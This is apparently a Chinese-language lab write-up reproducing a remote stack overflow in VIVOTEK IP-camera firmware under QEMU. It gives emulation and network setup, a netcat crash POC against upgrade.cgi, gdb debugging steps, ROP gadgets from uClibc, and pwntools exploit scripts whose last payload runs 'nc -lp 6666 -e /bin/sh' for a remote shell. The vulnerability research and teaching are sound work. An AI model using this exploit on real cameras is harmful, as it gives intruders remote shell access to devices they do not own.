漏洞文件

https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/VIVOTEK/remote_stack_overflow

另需文件

arml内核，文件系统，arm-gdbserver，initrd。
https://people.debian.org/~aurel32/qemu/armel/

启动qemu-system

qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1"  -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic

qemu-system里执行

ifconfig eth0 192.168.100.2 netmask 255.255.255.0
route add default gw 192.168.100.254

宿主机执行

sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -F
sudo iptables -X
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -t mangle -F
sudo iptables -t mangle -X
sudo iptables -P INPUT ACCEPT
sudo iptables -P FORWARD ACCEPT
sudo iptables -P OUTPUT ACCEPT
sudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE
sudo iptables -I FORWARD 1 -i tap0 -j ACCEPT
sudo iptables -I FORWARD 1 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo ifconfig tap0 192.168.100.254 netmask 255.255.255.0

传输文件

scp -r squashfs-root/ root@192.168.100.2:/root

启动程序

chmod -R 777 squashfs-root/
chroot ./squashfs-root/ /bin/sh
./usr/sbin/httpd
启动不成功，根据复现博客说的是固件通过主机名获取ip，如果主机名和固件的主机名不一样
就无法获取ip
/ # hostname
debian-armel
/ # vi ./etc/hosts 
./usr/sbin/httpd

测试POC

echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"  | netcat -v 192.168.100.2 80

程序成功dump

gdb调试

qemu

/ # ./usr/sbin/httpd 
sendto() error 2
[debug]add server push uri 3 video3.mjpg
[debug]add server push uri 4 video4.mjpg
[debug] after ini, server_push_uri[0] is /video3.mjpg
[debug] after ini, server_push_uri[1] is /video4.mjpg
AM_ParseConfigFile failed
fopen pid file: No such file or directory
/ # [29/Jan/2024:14:21:37 +0000] boa: server version 1.32.1.10(Boa/0.94.14rc21)
[29/Jan/2024:14:21:37 +0000] boa: starting server pid=2523, port 80
/ # ./arm-gdbserver --attach 192.168.100.254:1234 2523
Attached; pid = 2523
Listening on port 1234

user

gdb-multiarch ./usr/sbin/httpd
pwndbg> set architecture arm

pwndbg> target remote 192.168.100.2:1234
pwndbg> c

计算出溢出量是0x33
程序开启了NX不能使用shellcode
ROPgadget查找需要用的gadget

思路

arm的函数传参顺序是r0,r1,r2,r3,r4
所以我们需要把/bin/sh传到r0

ROPgadget --binary ./lib/libuClibc-0.9.33.3-git.so --only "pop|mov"

0x00033100 : pop {r0, pc}#因为strncopy遇见00会截断所以不能用这个
0x00048784 : pop {r1, pc}#pc相当于x86的ret
0x00016aa4 : mov r0, r1 ; pop {r4, r5, pc}

先确定r0的指向

from pwn import*
import requests
p=remote('192.168.100.2','80')

libc=ELF('./lib/libc.so.0')
context.log_level='debug'
libc_base=0xb6f2d000
pop_r1=0x00048784+libc_base
mov_r0_r1=0x00016aa4+libc_base
system=libc_base+libc.sym['system']
stack = 0xbeffeb60
amd='aaaaaa'
head = b"POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:"
payload = b'b'*(0x00003c-8)+p32(pop_r1)+p32(stack)+p32(mov_r0_r1)+b'b'*8+b'bbbb'
end = b'aaaaaaaaa'

p.sendline(head+payload+end)
p.interactive()

利用

我们通过执行nc开启端口来连接shell

from pwn import*
import requests
p=remote('192.168.100.2',80)

libc=ELF('./lib/libc.so.0')
context.log_level='debug'
libc_base=0xb6f2d000
pop_r1=0x00048784+libc_base
mov_r0_r1=0x00016aa4+libc_base
system=libc_base+libc.sym['system']
stack = 0xbeffeb64
amd='aaaaaa'
head = b"POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:"
payload = b'b'*(0x00003c-8)+p32(pop_r1)+p32(stack)+p32(mov_r0_r1)+b'b'*8+p32(system)
end = b'nc  -lp 6666 -e /bin/sh;'+b'\r\n\r\n'

p.sendline(head+payload+end)